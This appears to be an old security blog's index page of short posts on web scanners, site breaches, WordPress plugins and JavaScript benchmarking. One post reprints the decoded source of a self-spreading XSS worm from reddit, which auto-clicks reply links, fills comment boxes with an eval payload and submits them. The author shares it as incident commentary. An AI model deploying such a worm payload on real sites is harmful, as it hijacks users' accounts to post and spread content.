Recently Larry Suto published his second paper on web application security scanners (if you are wondering about his first one, you can find it here) and as expected it once again stirred up a couple of people.
And while he analyzed the most used web security scanners, I wonder if we could change our direction and focus on a not so well know, open source web application scanner.
Probably you’ve figured about now what I’m talking about, as writen in the title, I’m talking about “web application attack and audit framework” or w3af.
The authors describe it for short:
w3af is a Web Application Attack and Audit Framework. The project’s goal is to create a framework to find and exploit web application vulnerabilities that is easy to use and extend.
While this resembles the ideea (and direction) by which the project started, for me it seems that w3af is so much of a framework as Joomla! is for web applications development. I would rather call it a full featured web application testing platform.
Even if I’m not that big of a fan for automated vulnerability scanners, I have to admit that w3af has a nice series of discovery plugins which are enough reasons for me to give it thumbs up.
That’s all I wanted to share with you today. For more information about w3af I recommend their source forge page and Andre Riancho’s interview for OWASP podcast (this dude is the core developer of w3af)
Being an IT security enthusiast and knowing that most of the websites out there don’t take security seriously, I’m rarely surprised about big websites being compromised.
But this time I have been amazed, not because of a vulnerability, but because the attention Grooveshark gives to it’s users. A security warning for users that aren’t up to date with Adobe Flash, every time you enter the website… image here.
Bravo. It’s an example I would expect others to follow as well.
P.S. they have a great error page when the service is down.
Today when reddit was down for maintenance people kept gathering on the #redditdowntime channel on freenode where under a couple of minutes intriguing things started to happen.
You can read the whole story here (and come back afterwards).
(continue)
Today someone came to this blog searching for a twitter backup facility. I never did post such an application/script so I figured I’d share my way of backing up my tweets.
I actually never backup my tweets (nothing of value would be lost), and never intend to, but for the sake of posting something I’ve said I’d give it a go.
(continue)
Yesterday I have read a funny article on techtarget.
Funny from my perspective, because the author seemed to be real serious about the subject. In a few words the author suggest webmasters to use the html encrypter (it is actually an encoder) as an “effective deterrent”.
Like people would really sacrifice the possibly index-able content and accessibility for a false sense of security… come on, it must be a joke.
As I am writing this a javascript worm is having fun spreading on reddit. For one part we should be happy it only spreads and does not do anything else (you now, like cookie theft). On the other hand, it may be an attempt to DDoS reddit, because I’m suddenly starting to get error pages…
An error occurred while processing your request.
Reference #97.27c37259.1254106488.35b1d0e
The (decoded) code of the worm is the following:
// generate payload/attack vector
// having trouble understanding why this works
z="[x][b]\n[b]:/["+this.innerHTML+"](/onmouseover=eval(unescape(this.innerHTML9371d7a2e3ae86a00aab4771e39d255d9371d7a2e3ae86a00aab4771e39d255d//)";
// and what's with the 9371d7a2e3ae86a00aab4771e39d255d9371d7a2e3ae86a00aab4771e39d255d ?
// "click" all reply links in page
o=document;
e=o.getElementsByTagName('a');
for(i=0;i<e.length;i++)
if(e[i].innerHTML=='reply')
$(e[i]).click();
// fill with payload
o=document;
e=o.getElementsByTagName('textarea');
for(i=0;i<e.length;i++)
e[i].value=z;
// submit
e=o.getElementsByTagName('button');
for(i=0;i<e.length;i++)
if(e[i].innerHTML=='save'&&e[i].style.display!='none')
$(e[i]).click();
In the meantime of writing the article I tried to look for the invalid filtering in the source code, but as touching for the first time the code had no sense of direction. If someone would be kind enough to enlighten me in which file the code resides I’d be more than happy.
If not, we’ll have an unsolved mystery :)
UPDATE: worm author has happily shared its way of evading the filter.
UPDATE 2: post about the bug on the reddit blog.
There are a series of ways by which you could benchmark Javascript code. Either by using the Firebug console API, example:
console.time("first");
// some javascript code
console.timeEnd("first");
Another way would be the one which ppk suggested on his blog.
function testIt() {
var startTime = new Date().getTime();
// actual DOM functionality to be tested goes here
setTimeout(function () {
var endTime = new Date().getTime();
var result = (endTime-startTime)/1000;
// print result
},10)
}
The reason why the result is printed through a different function set to run on timeout is:
(…) some browsers only applies the result of the test (i.e. the changes in the DOM you want to test) to the screen after the function has ended entirely. (…) The correct way of conducting this test is setting a timeout for reading out the end time. The function ends when the in-memory DOM manipulation has been done, which allows the browser to apply the changes.
If that’s the case, we could also use the following function for benchmarking Javascript code (a more flexible version):
function benchmark(func) {
var startTime = new Date().getTime();
func();
var endTime = new Date().getTime();
return (endTime-startTime)/1000;
}
// as for usage
time = benchmark(function() {
// javascript code to benchmark
});
It is completely unrelated to any aspect of security, but there are some topics that just make me blog about… Anyway, very soon I’ll post on, have a few projects I’m working on lately.
As some of you may have noticed, news about ImageShack being hacked has started to circulate today. While I tried to see this for myself, part of the damage has been fixed; I say part because the ImageShack blog still throws database connection errors…
Even if this may have been worse for users who store their images there (myself included), there is more to it than meets the eye.
(continue)
As any other IT security enthusiast I have limited trust towards the platforms I use, the current case being WordPress. The intention was there (to write my own blogging platform) but quickly gave up to it, mostly due to lack of time…
I had a to make a compromise; use the platform but try to secure it as well… But instead of applying security from outside the platform, this time I was going to write WordPress plugins to do the job… five/ten minutes into coding stuff, I was like:
Wait! What the fuck am I doing? WordPress has got a huge number of extensions, for sure it’s got security oriented ones as well.
And I was right… after browsing a couple of minutes through them (I didn’t say there where many) I’ve came up with the following list of security extensions which I liked: Login LockDown, Paranoid911, Restrict Login By IP, Times to Come security plugin and WP Security Scan.
(continue)
There are a couple of security auditing frameworks out there, and the temptation is high on creating your own; either in Perl, Ruby, Python and why not in PHP as well.
Needles to say, I too was tempted in creating my own framework. Ideas kept flowing in, the project has been started and then BAM, I’ve read an interesting article on GNUCITIZEN, which made me rethink my strategy…
One of the comments pointed it out very well:
most of the stuff we need is on the shell already. pentesting frameworks is like the new security-testing hype. first we had hundreds of portscanners, then hundreds of webapp MiTM proxies, then hundreds of fuzzers, then hundreds of SQL injectors, now it’s about pentesting frameworks :)
So instead of starting to write redundant code, I started to learn already available command line tools, which have years of development behind and fill in almost every aspect they need to.
Basically I’m building my framework around already available tools, and only code up things that do not exist, or for some very particular cases.
(continue)
